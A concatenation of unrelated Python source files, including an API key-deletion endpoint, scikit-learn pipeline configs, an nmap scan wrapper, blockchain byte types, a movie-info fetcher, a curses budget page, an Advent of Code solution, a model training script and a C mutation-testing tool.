return errors.all_errors(type(err).__name__, err)
@restricted_api
def delete(self):
"""
Delete API key(s) associated to a user
---
tags:
- User Management
parameters:
- in: body
name: body
schema:
required:
- user
properties:
user:
type: string
description: user of the SOCA user
responses:
200:
description: Key(s) has been deleted successfully.
203:
description: Unable to find a token.
400:
description: Client error.
"""
parser = reqparse.RequestParser()
parser.add_argument('user', type=str, location='form')
args = parser.parse_args()
user = args["user"]
if user is None:
return errors.all_errors("CLIENT_MISSING_PARAMETER", "user (str) parameter is required")
try:
check_existing_keys = ApiKeys.query.filter_by(user=user, is_active=True).all()
if check_existing_keys:
for key in check_existing_keys:
key.is_active = False
key.deactivated_on = datetime.datetime.utcnow()
db.session.commit()
return {"success": True, "message": "Successfully deactivated"}, 200
else:
return errors.all_errors("NO_ACTIVE_TOKEN")
except Exception as err:
return errors.all_errors(type(err).__name__, err)
|
import numpy as np
from sklearn.cluster import FeatureAgglomeration
from sklearn.preprocessing import (
MaxAbsScaler,
MinMaxScaler,
Normalizer,
PolynomialFeatures,
RobustScaler,
StandardScaler,
Binarizer,
)
from sklearn.kernel_approximation import Nystroem, RBFSampler
from sklearn.decomposition import PCA, FastICA
from sklearn.feature_selection import (
SelectFwe,
SelectPercentile,
VarianceThreshold,
f_regression,
)
from sklearn.linear_model import ElasticNetCV, LassoLarsCV
from sklearn.ensemble import (
ExtraTreesRegressor,
GradientBoostingRegressor,
AdaBoostRegressor,
RandomForestRegressor,
)
from sklearn.tree import DecisionTreeRegressor
from sklearn.neighbors import KNeighborsRegressor
from sklearn.svm import LinearSVR
# For comparison, this selection of operators and hyperparameters is
# currently most of what TPOT supports.
reg_config = {
ElasticNetCV: {
"l1_ratio": np.arange(0.0, 1.01, 0.05),
"tol": [1e-5, 1e-4, 1e-3, 1e-2, 1e-1],
},
ExtraTreesRegressor: {
"n_estimators": [100],
"max_features": np.arange(0.05, 1.01, 0.05),
"min_samples_split": range(2, 21),
"min_samples_leaf": range(1, 21),
"bootstrap": [True, False],
},
GradientBoostingRegressor: {
"n_estimators": [100],
"loss": ["ls", "lad", "huber", "quantile"],
"learning_rate": [1e-3, 1e-2, 1e-1, 0.5, 1.0],
"max_depth": range(1, 11),
"min_samples_split": range(2, 21),
"min_samples_leaf": range(1, 21),
"subsample": np.arange(0.05, 1.01, 0.05),
"max_features": np.arange(0.05, 1.01, 0.05),
"alpha": [0.75, 0.8, 0.85, 0.9, 0.95, 0.99],
},
AdaBoostRegressor: {
"n_estimators": [100],
"learning_rate": [1e-3, 1e-2, 1e-1, 0.5, 1.0],
"loss": ["linear", "square", "exponential"],
# 'max_depth': range(1, 11) not available in sklearn==0.19.1
},
DecisionTreeRegressor: {
"max_depth": range(1, 11),
"min_samples_split": range(2, 21),
"min_samples_leaf": range(1, 21),
},
KNeighborsRegressor: {
"n_neighbors": range(1, 101),
"weights": ["uniform", "distance"],
"p": [1, 2],
},
LassoLarsCV: {"normalize": [True, False]},
LinearSVR: {
"loss": ["epsilon_insensitive", "squared_epsilon_insensitive"],
"dual": [True, False],
"tol": [1e-5, 1e-4, 1e-3, 1e-2, 1e-1],
"C": [1e-4, 1e-3, 1e-2, 1e-1, 0.5, 1.0, 5.0, 10.0, 15.0, 20.0, 25.0],
"epsilon": [1e-4, 1e-3, 1e-2, 1e-1, 1.0],
},
RandomForestRegressor: {
"n_estimators": [100],
"max_features": np.arange(0.05, 1.01, 0.05),
"min_samples_split": range(2, 21),
"min_samples_leaf": range(1, 21),
"bootstrap": [True, False],
},
# Preprocesssors
Binarizer: {"threshold": np.arange(0.0, 1.01, 0.05)},
FastICA: {"tol": np.arange(0.0, 1.01, 0.05)},
FeatureAgglomeration: {
"linkage": ["ward", "complete", "average"],
"affinity": ["euclidean", "l1", "l2", "manhattan", "cosine", "precomputed"],
"param_check": [
lambda params: (not params["linkage"] == "ward")
or params["affinity"] == "euclidean"
],
},
MaxAbsScaler: {},
MinMaxScaler: {},
Normalizer: {"norm": ["l1", "l2", "max"]},
Nystroem: {
"kernel": [
"rbf",
"cosine",
"chi2",
"laplacian",
"polynomial",
"poly",
"linear",
"additive_chi2",
"sigmoid",
],
"gamma": np.arange(0.0, 1.01, 0.05),
"n_components": range(1, 11),
},
PCA: {"svd_solver": ["randomized"], "iterated_power": range(1, 11)},
PolynomialFeatures: {
"degree": [2],
"include_bias": [False],
"interaction_only": [False],
},
RBFSampler: {"gamma": np.arange(0.0, 1.01, 0.05)},
RobustScaler: {},
StandardScaler: {},
# Selectors
SelectFwe: {"alpha": np.arange(0, 0.05, 0.001), "score_func": {f_regression: None}},
SelectPercentile: {"percentile": range(1, 100), "score_func": {f_regression: None}},
VarianceThreshold: {"threshold": np.arange(0.05, 1.01, 0.05)},
}
|
from libnmap.process import NmapProcess
from libnmap.parser import NmapParser, NmapParserException
from time import sleep
class DinoNmap:
def __init__(self):
pass
def do_scan(self, targets, options):
parsed = None
nmproc = NmapProcess(targets, options)
rc = nmproc.run()
if rc != 0:
print("nmap scan failed: {0}".format(nmproc.stderr))
#print(type(nmproc.stdout))
try:
parsed = NmapParser.parse(nmproc.stdout)
except:
print("Exception raised while parsing scan: {0}".format(e.msg))
return parsed
def print_scan(self, nmap_report):
print("Starting Nmap {0} at {1}".format(
nmap_report.version,
nmap_report.started,
))
for host in nmap_report.hosts:
if len(host.hostnames):
tmp_host = host.hostnames.pop()
else:
tmp_host = host.address
print("Nmap scan report for {0} ({1})".format(
tmp_host,
host.address))
print("Host is {0}.".format(host.status))
print(" PORT STATE SERVICE")
for serv in host.services:
pserv = "{0:>5s}/{1:3s} {2:12s} {3}".format(
str(serv.port),
serv.protocol,
serv.state,
serv.service)
if len(serv.banner):
pserv += " ({0})".format(serv.banner)
print(pserv)
print(nmap_report.summary)
def scan_async(self, targets, options):
nmap_proc = NmapProcess(targets, options)
rc = nmap_proc.run_background()
while nmap_proc.is_running():
print("scanning {0}: ETC: {1} DONE: {2}% {3}".format(
targets,
nmap_proc.etc,
nmap_proc.progress,
nmap_proc.rc,
))
sleep(2)
try:
parsed = NmapParser.parse(nmap_proc.stdout)
except:
print("Exception raised while parsing scan: {0}".format(e.msg))
return parsed
def background_proc(self, targets, options, event_callback=None):
nmap_proc = NmapProcess(targets, options, event_callback)
nmap_proc.run_background()
return nmap_proc
def scan_many(self, targets, options):
still_running = True
results = []
results_parsed = []
for target in targets:
results.append(background_proc(target, options))
while still_running:
count_running = 0
for process in results:
if process.is_running():
count_running += 1
if count_running == 0:
still_running = False
else:
#print("{} running".format(count_running))
sleep(1)
for result in results:
parsed = NmapParser.parse(result.stdout)
results_parsed.append(parsed)
return results_parsed
def scan_list(self, targets):
""" returns a list of IPs nmap would scan (-sL) """
hosts = []
for host in self.do_scan(targets, "-sL").hosts:
hosts.append(host.address)
return hosts
|
import base64
from abc import ABCMeta
from enum import Enum
from typing import Union
class Bytes(bytes):
size = None
prefix = None
def __new__(cls, *args, **kwargs):
self = super().__new__(cls, *args, **kwargs)
if cls.size is not None and cls.size != len(self):
raise RuntimeError
return self
def __repr__(self):
type_name = type(self).__qualname__
return type_name + "(" + super().__repr__() + ")"
def __str__(self):
type_name = type(self).__qualname__
return type_name + "(" + self.hex_xx() + ")"
def hex_xx(self):
if self.prefix:
return self.prefix + self.hex()
return self.hex()
@classmethod
def fromhex(cls, value: str, ignore_prefix=False, allow_malformed=False):
if isinstance(cls, Address):
raise TypeError("Address.fromhex() cannot be used. Because Address is ABC.")
try:
if cls.prefix and not ignore_prefix:
prefix, contents = value[:len(cls.prefix)], value[len(cls.prefix):]
if prefix != cls.prefix:
raise ValueError(f"Invalid prefix. {cls.__qualname__}, {value}")
else:
contents = value
if len(contents) != cls.size * 2:
raise ValueError(f"Invalid size. {cls.__qualname__}, {value}")
if contents.lower() != contents:
raise ValueError(f"All elements of value must be lower cases. {cls.__qualname__}, {value}")
return cls(bytes.fromhex(contents))
except:
if not allow_malformed:
raise
return MalformedStr(cls, value)
class VarBytes(Bytes):
prefix = '0x'
def hex_0x(self):
return self.prefix + self.hex()
class Hash32(VarBytes):
size = 32
class Address(Bytes, metaclass=ABCMeta):
size = 20
@classmethod
def fromhex_address(cls, value: int, allow_malformed=False):
try:
prefix, contents = value[:2], value[2:]
if len(contents) != cls.size * 2:
raise ValueError(f"Invalid size. {cls.__qualname__}, {value}")
if contents.lower() != contents:
raise ValueError(f"All elements of value must be lower cases. {cls.__qualname__}, {value}")
if prefix == ContractAddress.prefix:
return ContractAddress(bytes.fromhex(contents))
if prefix == ExternalAddress.prefix:
return ExternalAddress(bytes.fromhex(contents))
raise ValueError(f"Invalid prefix. {cls.__qualname__}, {value}")
except:
if not allow_malformed:
raise
return MalformedStr(cls, value)
class ExternalAddress(Address):
prefix = "hx"
def hex_hx(self):
return self.prefix + self.hex()
class ContractAddress(Address):
prefix = "cx"
def hex_cx(self):
return self.prefix + self.hex()
class Signature(Bytes):
size = 65
def recover_id(self):
return self[-1]
def signature(self):
return self[:-1]
def to_base64(self):
return base64.b64encode(self)
def to_base64str(self):
return self.to_base64().decode('utf-8')
def __str__(self):
type_name = type(self).__qualname__
return type_name + "(" + self.to_base64str() + ")"
@classmethod
def from_base64(cls, base64_bytes: bytes):
sign_bytes = base64.b64decode(base64_bytes)
return Signature(sign_bytes)
@classmethod
def from_base64str(cls, base64_str: str):
base64_bytes = base64_str.encode('utf-8')
return cls.from_base64(base64_bytes)
class MalformedStr:
def __init__(self, origin_type, value):
self.origin_type = origin_type
self.value = value
def hex(self):
return self.value
def hex_xx(self):
return self.value
def hex_hx(self):
return self.value
def hex_0x(self):
return self.value
def str(self):
return self.value
def __eq__(self, other):
if type(self) is not type(other):
return False
return self.origin_type == other.origin_type and self.value == other.value
def __hash__(self):
return hash(self.origin_type) ^ hash(self.value)
def __repr__(self):
type_name = type(self).__qualname__
origin_type_name = self.origin_type.__qualname__
return type_name + f"({origin_type_name}, {repr(self.value)})"
def __str__(self):
type_name = type(self).__qualname__
origin_type_name = self.origin_type.__qualname__
return type_name + f"({origin_type_name}, {self.value})"
def int_fromhex(value: str):
if not isinstance(value, str):
raise ValueError(f"This is not string. {value}")
if value == value.replace("0x", ""):
return MalformedStr(int, value)
if value != value.lower():
return MalformedStr(int, value)
try:
return int(value, 16)
except ValueError:
return MalformedStr(int, value)
def int_tohex(value: Union[int, MalformedStr]):
if isinstance(value, int):
return hex(value)
return value.hex_xx()
def int_fromstr(value: Union[str, int]):
try:
return int(value)
except ValueError:
return MalformedStr(int, value)
def int_tostr(value: Union[int, MalformedStr]):
if isinstance(value, int):
return str(value)
return value.str()
class TransactionStatusInQueue(Enum):
normal = 1
fail_validation = 2
fail_invoke = 3
added_to_block = 4
precommited_to_block = 5
|
from .omdb import get_omdb_movie
from .tmdb import get_tmdb_movie, get_tmdb_genre, get_tmdb_details
def get_api(title, year, external_api="omdb"):
item = {
"title": None,
"genre": None,
"imdb": None,
"runtime": None,
"tomato": None,
"year": None,
"awards": None,
"cast": None,
"director": None,
"poster": None,
"description": None,
"response": False
}
if external_api == "omdb":
omdb = get_omdb_movie(title, year)
if omdb is not None and omdb['Response'] == 'True':
item["title"] = omdb["Title"]
item["genre"] = omdb["Genre"]
item["imdb"] = omdb["imdbRating"]
item["runtime"] = omdb["Runtime"]
item["tomato"] = get_rotten_score(omdb)
item["year"] = omdb["Year"]
item["awards"] = omdb["Awards"]
item["cast"] = omdb["Actors"]
item["director"] = omdb["Director"]
item["poster"] = omdb["Poster"]
item["description"] = omdb["Plot"]
item['response'] = omdb["Response"]
else:
item['response'] = 'False'
elif external_api == "tmdb":
tmdb = get_tmdb_movie(title, year)
try:
tmdb_details = get_tmdb_details(tmdb["results"][0]['id'])
except IndexError:
item['response'] = 'False'
if tmdb is not None and tmdb["results"]:
poster_path = tmdb["results"][0]['poster_path']
item["title"] = tmdb["results"][0]['title']
item["year"] = tmdb["results"][0]['release_date'].split('-', 1)[0]
item["genre"] = get_tmdb_genre(tmdb["results"][0]['genre_ids'])
item["imdb"] = "unsupported"
item["runtime"] = tmdb_details['runtime']
item["tomato"] = "unsupported"
item["awards"] = "unsupported"
item["cast"] = "unsupported"
item["director"] = "unsupported"
item["poster"] = "http://image.tmdb.org/t/p/w185" + str(poster_path)
item['response'] = 'True'
elif not tmdb["results"]:
item['response'] = 'False'
return item
def get_rotten_score(item):
try:
if item['Ratings'][1]['Source'] == "Rotten Tomatoes":
return item['Ratings'][1]['Value']
else:
return "N/A"
except IndexError:
return "N/A"
|
"""
Displays overview financial data (cash flow)
"""
import curses
from app.const import NC_COLOR_TAB, NC_COLOR_TAB_SEL
from app.methods import format_currency, ellipsis, alignr
from app.page import Page
class PageOverview(Page):
""" Page class to display overview data """
def __init__(self, win, api, set_statusbar):
self.cols = [
["Month", 8],
["In", 10],
["Out", 10],
["Net", 10],
["Predicted", 12],
["Balance", 10]
]
self.future_cols = ['food', 'general', 'holiday', 'social']
super().__init__(win, api, set_statusbar)
def get_data(self):
res = self.api.req(['data', 'overview'])
return res['data']
def calculate_data(self):
""" calculates future spending data based on past averages """
# calculate table values
year_month_start = self.data['startYearMonth']
year_month_end = self.data['endYearMonth']
year_month_now = self.data['currentYear'], self.data['currentMonth']
# number of months (inclusive) since the start month
num_rows = 12 * (year_month_end[0] - year_month_start[0]) + \
year_month_end[1] - year_month_start[1] + 1
months = ["Jan", "Feb", "Mar", "Apr", "May", "Jun", \
"Jul", "Aug", "Sep", "Oct", "Nov", "Dec"]
# calculate futures based on averages
future_key = 12 * (year_month_now[0] - year_month_start[0]) + \
year_month_now[1] - year_month_start[1] + 1
average = [
sum([self.data['cost'][col][i] for i in range(future_key)]) / future_key
for col in self.future_cols
]
out_with_future = [
sum([self.data['cost'][col][i] if i < future_key else average[index] \
for (index, col) in enumerate(self.future_cols)]) \
+ self.data['cost']['bills'][i]
for i in range(num_rows)
]
# net spending
net = [
self.data['cost']['income'][i] - out_with_future[i]
for i in range(num_rows)
]
# calculate predicted balance based on future spending predictions
predicted = [
self.data['cost']['balance'][max(0, i - 1)] + net[i]
for i in range(future_key + 1)
]
for i in range(future_key + 1, num_rows):
predicted.append(int(predicted[i - 1] + net[i]))
rows = [
[
"{}-{}".format(months[(year_month_start[1] - 1 + i) % 12], \
(year_month_start[0] + (i - 1 + year_month_start[1]) // 12) % 1000),
format_currency(self.data['cost']['income'][i], self.cols[1][1] - 1),
format_currency(out_with_future[i], self.cols[2][1] - 1),
format_currency(net[i], self.cols[3][1] - 1),
format_currency(predicted[i], self.cols[4][1] - 1),
format_currency(self.data['cost']['balance'][i], self.cols[5][1] - 1)
]
for i in range(num_rows)
]
return rows, year_month_start, year_month_now
def draw(self):
rows, year_month_start, year_month_now = self.calculate_data()
colors = [
curses.color_pair(NC_COLOR_TAB[0]), # inactive
curses.color_pair(NC_COLOR_TAB_SEL[0]) # active
]
num = {
'rows': len(rows),
'disp': min(self.dim[0], len(rows))
}
active_row = 12 * (year_month_now[0] - year_month_start[0]) + \
year_month_now[1] - year_month_start[1]
# draw all the rows and columns
for i in range(num['disp']):
if i == 0:
# header
col = 0
for (col_name, col_width) in self.cols:
self.win.addstr(0, col, alignr(col_width - 1, col_name))
col += col_width
else:
# data
row = num['rows'] - num['disp'] + i - 1 + 1
active = row == active_row
color = colors[1] if active else colors[0]
if active:
self.win.addstr(i, 0, ' ' * self.dim[1], color)
col = 0
j = 0
for (j, (col_name, col_width)) in enumerate(self.cols):
self.win.addstr(i, col, ellipsis(rows[row][j], col_width), \
color | curses.A_BOLD if j == 5 else color)
col += col_width
def set_nav_active(self, status):
return False # this page can't be active
|
#!/usr/bin/env python3
from pathlib import Path
import re
class Probe:
x = y = 0
def __init__(self, u, v):
self.u = u
self.v = v
def step(self):
self.x += self.u
self.y += self.v
self.u = max(0, self.u - 1)
self.v -= 1
class Target:
def __init__(self, x1, x2, y1, y2):
self.x1 = x1
self.x2 = x2
self.y1 = y1
self.y2 = y2
def _height(self, u, v):
p = Probe(u, v)
while True:
p.step()
if self.x2 < p.x or p.y < self.y1:
break
if self.x1 <= p.x and p.y <= self.y2:
return (v + 1) * v // 2
def heights(self, u):
for v in range(self.y1, -self.y1):
h = self._height(u, v)
if h is not None:
yield h
def main():
t = Target(*map(int, re.findall('-?[0-9]+', Path('input', '17').read_text())))
print(max(h for u in range(t.x2 + 1) for h in t.heights(u)))
if '__main__' == __name__:
main()
|
import sys
sys.path.append('..')
from exnet_v3 import *
from sklearn.metrics import average_precision_score
physical_devices = tf.config.experimental.list_physical_devices('GPU')
if len(physical_devices):
# The experiment will only take necessary memory on the GPU.
tf.config.experimental.set_memory_growth(physical_devices[0], True)
seed = 0
asset = 'TEF'
# Build params
n_experts = 4
spec_weight = 7.7e-4
entropy_weight = 4.2e-2
expert_architecture = [32, 32]
embedding_size = 32
dropout_rates = {'input': 0.1, 'hidden': 0.5}
weight_decay = {'l1': 0., 'l2': 0.}
gamma = 2.5
# Fit params
n_epochs = 400
patience = 20
batch_size = 1024
learning_rate = 7.8e-4
optimizer = 'nadam'
lookahead = True
# ===== Preparing data =====
data = pd.read_csv(f'data/IBEX_{asset}_dataset.csv')
n_investors = np.unique(data.investor_encoding.values).shape[0]
train_idx = data['train_idx'].values
val_idx = data['val_idx'].values
test_idx = data['test_idx'].values
features = list(data.columns[3:-3]) # Removing irrelevant columns - date, encoding, target & splits.
data = data[['date', 'investor_encoding', 'buyer'] + features]
train_data = data[train_idx]
val_data = data[val_idx]
test_data = data[test_idx]
train_data_ = (train_data[features].values.astype(np.float32),
train_data.investor_encoding.values.astype(np.int32),
pd.get_dummies(train_data.buyer).values.astype(np.float32))
val_data_ = (val_data[features].values.astype(np.float32),
val_data.investor_encoding.values.astype(np.int32),
pd.get_dummies(val_data.buyer).values.astype(np.float32))
test_data_ = (test_data[features].values.astype(np.float32),
test_data.investor_encoding.values.astype(np.int32),
pd.get_dummies(test_data.buyer).values.astype(np.float32))
# ===== Training model =====
print(f'Training on {train_data_[0].shape[0]} samples, validating on {val_data_[0].shape[0]} samples.')
model = ExNet(n_feats=len(features), output_dim=2, n_experts=n_experts, expert_architecture=expert_architecture,
n_investors=n_investors, embedding_size=embedding_size, dropout_rates=dropout_rates, weight_decay={'l1': 0., 'l2': 0.},
spec_weight=spec_weight, entropy_weight=entropy_weight, gamma=gamma, name=f'ExNet_{asset}')
model.fit(train_data=train_data_, val_data=val_data_, n_epochs=n_epochs, batch_size=batch_size, optimizer='nadam',
learning_rate=learning_rate, lookahead=True, patience=patience, seed=seed,
save_path='models/')
# ===== Results =====
train_pred = model.predict(train_data_[0:2])
val_pred = model.predict(val_data_[0:2])
test_pred = model.predict(test_data_[0:2])
train_score = average_precision_score(train_data.buyer.values, train_pred[:, 1])
val_score = average_precision_score(val_data.buyer.values, val_pred[:, 1])
test_score = average_precision_score(test_data.buyer.values, test_pred[:, 1])
print(f'train ap: {100*train_score:.2f} - val ap: {100*val_score:.2f} - test ap: {100*test_score:.2f}')
_ = model.get_experts_repartition(print_stats=True)
model.plot_experts_repartition()
model.plot_experts_umap(n_neighbors=50, min_dist=0.1)
|
import shutil
import utils
import sys
import os
import random
from typing import Tuple, List
NULL_STRING = " "
pattern_dict = {
# To use "test_patterns" as the mutation pattern set, set "patterns" attribute in
# configuration json to "test_patterns".
"test_patterns" : {
" < " : " == "
},
# Add your own custom pattern sets here. eg.
# "<YOUR_CUSTOM_PATTERNS>" : {
# " > " : [ " < ", " == " ],
# " return " : " return -1 * ",
# ...
# }
"custom_patterns" : {
" < " :
[" <= ", " > ", " == "],
"==" : "!=",
"!=" : "==",
" && " : " || ",
" || " : " && ",
"++" :
[ "+=2", "-=2" ],
" + " : " - ",
" * " : " + ",
" - " : " + ",
"break;" : "{;}",
" free(": "// free(",
"[" :
[ "[ -1 + ", "[ 1 + ", "[ 0 * " ],
"," :
[ ", -2 * ", ", 2 * " ],
"0x00" :
[ "0x01", "0x55" ],
"0x01" :
[ "0x00", "0x05" ],
"return " :
[ "return 2 * ", "return -2 * " ]
},
"default_patterns" : {
" < " :
[ " == ", " != ", " > ", " <= ", " >= "],
" > " :
[ " != ", " < ", " <= ", " >= ", " == " ],
"<=" :
[ " != ", " < ", " > ", " >= ", "==" ],
">=" :
[ " != ", " < ", " <= ", " > ", "==" ],
"==" :
[ " != ", " = ", " < ", " > ", " <= ", " >= " ],
"!=" :
[ " == ", " = ", " < ", " > ", " <= ", " >= " ],
# " = " :
# [ " == ", " != ", " < ", " > ", " <= ", " >= ", " = 0 * ", " = 0 ;//", " = NULL; //", " = ! " ],
" + " :
[ " - ", " * ", " / ", " % " ],
" - " :
[ " + ", " * ", " / ", " % " ],
" * " :
[ " + ", " - ", " / ", " % " ],
# " / " :
# [ " % ", " * ", " + ", " - " ],
# " % " :
# [ " / ", " + ", " - ", " * " ],
" + 1" :
[ " - 1", "+ 0", "+ 2", "- 2" ],
" - 1" :
[ " + 1", "+ 0", "+ 2", "- 2" ],
# " & " :
# [ " | ", " ^ " ],
# " | " :
# [ " & ", " ^ " ],
# " ^ " :
# [ " & ", " | " ],
# " &= " :
# [ " |= ", " ^= " ],
# " |= " :
# [ " &= ", " ^= " ],
# " ^= " :
# [ " &= ", " |= " ],
# " ~" :
# [ " !", NULL_STRING ],
# " !" :
# [ " ~", NULL_STRING ],
" && " :
[ " & ", " || "," && !" ],
" || " :
[ " | ", " && ", " || !" ],
" >> " : " << ",
" << " : " >> ",
" << 1" :
[ " << 0"," << -1", "<< 2" ],
" >> 1" :
[ " >> 0", " >> -1", ">> 2" ],
"++" : "--",
"--" : "++",
"++;" :
[ "--;", "+=2;", "-=2;" ],
"++)" :
[ "--)", "+=2)", "-=2)" ],
"--;" :
[ "++;", "+=2;", "-=2;" ],
"--)" :
[ "++)", "+=2)", "-=2)" ],
" true " : " false ",
" false " : " true ",
"if (" :
[ "if ( ! ", "if ( ~ ", "if ( 1 || ", "if ( 0 && " ],
"while (" :
[ "while ( ! ", "while ( ~ ", "while ( 0 && " , "// while (", " if (", "if (!"],
"break;" : "{;}",
"continue;" : "{;}",
"goto " : "//goto ",
"return " :
[ "return 0; //", "return 1; //", "return NULL; //", "return -1; //", "return 2* ", "return -1 * " ],
# for embedded systems
"0x00" :
[ "0x01", "0x05", "0x0A", "0x0F", "0xAA", "0x55", "0xFF" ],
"0x01 " :
[ "0x00 ", "0x05 ", "0x0A ", "0x0F " ],
"0x05 " :
[ "0x00 ", "0x01 ", "0x0A ", "0x0F " ],
"0x0A " :
[ "0x00 ", "0x01 ", "0x05 ", "0x0F " ],
"0x0F " :
[ "0x00 ", "0x01 ", "0x05 ", "0x0A " ],
"0x55 " :
[ "0x00 ", "0xAA ", "0xFF " ],
"0xAA " :
[ "0x00 ", "0x55 ", "0xFF " ],
"0xFF " :
[ "0x00 ", "0x55 ", "0xAA " ],
"[" :
[ "[ -1 + ", "[ 1 + ", "[ 0 * " ],
"(": " (! ",
");":
[ "*0);", "*-1);", "*2);" ],
"," :
[ ", ! ", ", 0 * ", ", -1 * ", ", 2 *" ],
" ? " :
[ " && 0 ? ", " || 1 ? " ],
" int " :
[" short int ", " char " ],
" signed " : " unsigned ",
" unsigned " : " signed ",
" long " :
[ " int ", " short int ", " char " ],
" float ": " int ",
" double ": " int ",
" free(": "// free(",
"case ": "// case ",
"default ": "// default ",
# null terminate a string
"\"": "\"\\0",
"else {": "{",
"else": "// else",
}
}
class Occurrence():
""" Object to keep track of a pattern's occurrence.
Access the object's fields directly.
`pattern`: a Pattern type.
`file`: str containing path to the file (source code).
`line`: int containing the line in the file where the `pattern` is found.
`index`: int representing the index of the line where the `pattern` occurs.
"""
def __init__(self, pattern, file, line, index):
self.pattern = pattern
self.file = file
self.line = line
self.index = index
def __str__(self):
return f'Pattern {self.pattern.pattern} found at File: {self.file}, Line: {self.line}, Index: {self.index}'
def __repr__(self):
return f'({self.pattern}, {self.file}, {self.line}, {self.index})'
class Pattern():
""" Represents a mutation pattern
Access fields directly.
`pattern`: str containing the original mutant operator.
`transformation`: str containing the mutated operator.
eg. `pattern`: " = ", `transformation`: " <= "
"""
def __init__(self, pattern, transformation):
self.pattern = pattern
self.transformation = transformation
def __str__(self):
return f'{self.pattern} : {self.transformation}'
class Mutator():
""" The main driver object to create mutations for a run.
Create one Mutator object for each set of patterns and source code files.
"""
def __init__(self, src: dict, mutation_patterns: dict, rng=random.Random()):
""" Initializes various fields
`src` is a dictionary mapping from a path to file to a list of line ranges. eg.
{
"code.c" : [],
"code2.c" : [[1,12],[50,150]]
}
`mutation_pattern` is a dictionary mapping from str to list of str or str. eg.
{
" == " : [ " <= ", " != " ],
" return " : [" return -2 * ", " return -1 + "],
"++" : "--"
}
`rng` is a Random type. Used for random operations.
"""
utils.yellow_print("CWD: {}".format(os.getcwd()))
self.olds = [] # stores original file paths
self.modified = [] # stores path to the modified file
self.lines_to_mutate = {} # maps file to the lines that file should mutate
self.src = src
for f in self.src:
# create copies of the original
old = '{}.old'.format(f)
shutil.copyfile(f, old)
self.olds.append(old)
self.modified.append(f)
# process the line intervals into a list of line numbers
if len(self.src[f]) == 0:
self.lines_to_mutate[old] = list(range(1, len(open(f).read().split('\n')) + 1))
else:
self.lines_to_mutate[old] = utils.flatten(utils.merge(self.src[f]))
self.rng = rng
self.mutation_patterns = self.flattenPatterns(mutation_patterns)
self.pattern_generator = self.mutation_patterns.copy()
self.file_index = None
def restore(self):
""" Restores source files by replacing src with old
Path should be root directory /freertos
"""
for i in range(len(self.src)):
shutil.copyfile(self.olds[i], self.modified[i])
utils.yellow_print("Source Code Restored")
def cleanup(self):
""" Cleans up by deleting all old files
"""
self.restore()
for i in range(len(self.src)):
os.remove(self.olds[i])
def mutate(self, occurrence: Occurrence) -> Tuple[str, str]:
""" Mutates given `occurrence` using `occurrence.pattern`
Returns the original line and the mutated line
See mutator.py for information on what a Occurrence object is
"""
mutation_pattern = occurrence.pattern
source_code = open(occurrence.file).read().split('\n')
print("\n==> @ Line: " + str(occurrence.line) + "\n")
print("Original Line : " + source_code[occurrence.line - 1].strip())
mutated_line = (source_code[occurrence.line - 1][0:occurrence.index] +
source_code[occurrence.line - 1][occurrence.index:]
.replace(mutation_pattern.pattern, mutation_pattern.transformation, 1))
print("After Mutation : " + mutated_line.strip())
self.write_to_file(occurrence.file.rstrip('.old'), source_code, occurrence.line - 1, mutated_line)
return source_code[occurrence.line - 1], mutated_line
def write_to_file(self, path, source_code, mutated_line_number, mutated_line):
""" Writes a file to `path` by replacing line at `mutated_line_number` in `source_code`
with `mutated_line`.
Helper to separate write to file process with mutate function.
"""
output_file = open(path, "w")
for i in range(0,len(source_code)) :
if i == mutated_line_number :
output_file.write("/* XXX: original code was : " + source_code[i] + " */\n")
output_file.write(mutated_line + "\n")
else :
output_file.write(source_code[i] + "\n")
output_file.close()
print("\nOutput written to " + path + "\n")
def findOccurrences(self, mutation_pattern: Pattern) -> List[Occurrence]:
""" Finds all occurrences of given `mutation_pattern` in current Mutator
`mutation_pattern` is a Pattern type. (see mutator.Pattern in mutator.py)
Returns a list of Occurrence objects of the given `mutation_pattern`
(see mutator.Occurrence in mutator.py)
If there are multiple source files, searches all of them. Occurrence object
contains fields to access file, line, and index within line to find the exact
substring of the pattern.
"""
occurrences = []
m = mutation_pattern.pattern
for f in self.olds:
source_code = open(f).read().split('\n')
ignored_lines = set()
for line in self.lines_to_mutate[f]:
# do not mutate preprocessor, comments, or assert statements
if (source_code[line - 1].strip().startswith("#") or
source_code[line - 1].strip().startswith("//")):
continue
# add block comments to ignored line set
if "/*" in source_code[line - 1]:
while "*/" not in source_code[line - 1]:
ignored_lines.add(line)
line += 1
ignored_lines.add(line)
if line in ignored_lines:
continue
# count the number of times this mutation pattern base appears
number_of_substrings_found = source_code[line - 1].count(m)
mutate_at_index = 0
# if there is at least one occurrence
if number_of_substrings_found > 0 :
for _ in range(0, number_of_substrings_found):
# find the index of the first occurrence
if mutate_at_index == 0 :
mutate_at_index = source_code[line - 1].index(m)
else :
# an occurrence has been found, so begin looking only at the previous
# location's index + 1 (the index after the previous occurrence)
mutate_at_index = source_code[line - 1].index(m, mutate_at_index + 1)
occurrences.append(Occurrence(mutation_pattern, f, line, mutate_at_index))
return occurrences
def flattenPatterns(self, mutation_patterns):
""" Flattens `mutation_patterns` into a list of mutation patterns
`mutation_patterns` is a dictionary with mutant patterns
Returns a list of Pattern objects (see mutator.Pattern in mutator.py).
For ease of definition, the mutation_patterns is supplied as a dictionary,
either through the default patterns, or through the configs.
This function will process the dictionary into a list by creating Pattern
objects for each key - transformation pair.
"""
mutation_list = []
for m in mutation_patterns:
if type(mutation_patterns[m]) != str:
for transformation in mutation_patterns[m]:
mutation_list.append(Pattern(m, transformation))
else:
mutation_list.append(Pattern(m, mutation_patterns[m]))
return mutation_list
def getPatterns(self) -> List[Pattern]:
""" Returns a list of flattened Pattern objects
"""
return self.mutation_patterns
def generateMutants(self, mutants_per_pattern=10, random=False) -> List[Occurrence]:
""" Returns a list of occurrences including multiple different patterns
For each pattern, the list contains a maximum of `mutants_per_pattern` number of
occurrences. Default is 10 if not provided.
If `random` is True, then the list is shuffled using this mutator's rng
"""
utils.yellow_print("Searching for patterns...")
# list of mutations to execute, contains occurrence objects
mutations_list = []
# dictionary that maps a pattern to the list of occurrences
mutations_dict = {}
# go through each pattern
for mp in self.getPatterns():
# find their occurrences
occurrences_with_mp = self.findOccurrences(mutation_pattern=mp)
# for o in occurrences_with_mp:
# utils.yellow_print(o)
# if occurrences are found add them to dictionary
if mp not in mutations_dict:
mutations_dict[mp] = []
if random:
self.rng.shuffle(occurrences_with_mp)
mutations_dict[mp] += occurrences_with_mp[0:mutants_per_pattern]
for mp in mutations_dict:
mutations_list += mutations_dict[mp]
if random:
self.rng.shuffle(mutations_list)
